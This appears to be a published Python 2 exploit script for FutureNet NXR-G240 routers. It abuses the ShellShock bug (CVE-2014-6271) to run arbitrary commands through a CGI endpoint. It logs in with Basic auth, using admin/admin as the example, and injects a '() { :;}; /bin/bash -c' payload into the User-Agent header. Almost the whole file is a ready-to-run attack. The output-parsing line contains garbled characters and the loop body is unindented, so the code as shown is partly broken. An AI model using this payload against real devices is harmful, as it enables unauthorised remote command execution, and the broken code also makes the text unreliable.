# -*- coding: utf-8 -*-
# Title: FutureNet NXR-G240 Series - "ShellShock" Remote Command Injection
# Date: 2018-06-12
# Author: Nassim Asrir
# You have a Q ? Contact me at: https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: http://www.centurysys.co.jp/
# CVE: CVE-2014-6271
# Greetz to : Nadia BENCHIKHA for the great help.
# Example:
# [root@parrot]a[/home/sniperpex/Desktop]
# #python ./exploit.py http://server -u admin -p admin -c ps
import urllib2
import base64
import bs4
import sys
import argparse
reload(sys)
sys.setdefaultencoding('utf8')
ap = argparse.ArgumentParser(description="FutureNet NXR-G240 Series - ShellShock Remote Command Injection ")
ap.add_argument("host", help="(Example: http://127.0.0.1).")
ap.add_argument("-u", "--user", help="Admin username (Default: admin)")
ap.add_argument("-p", "--password", help="Admin password (Default: admin)")
ap.add_argument("-c", "--cmd", help="Command to run.")
args = ap.parse_args()
request = urllib2.Request(args.host+"/cgi-bin/information.cgi?section=arp&module=system&command=execute")
base64string = base64.encodestring('%s:%s' % (args.user, args.password)).replace('\n', '')
print '[+] Authentication & Exploit in progress...'
request.add_header("Authorization", "Basic %s" % base64string)
request.add_header("User-Agent", "() { :;}; /bin/bash -c "+str(args.cmd))
response = urllib2.urlopen(request)
soup = bs4.BeautifulSoup(response, 'html.parser')
for textarea in soup.find_all('pre'):
print textarea.get_text().replace("# ARPaea +-",'').replace("e!"c$?oaSSaa3/4aa",'')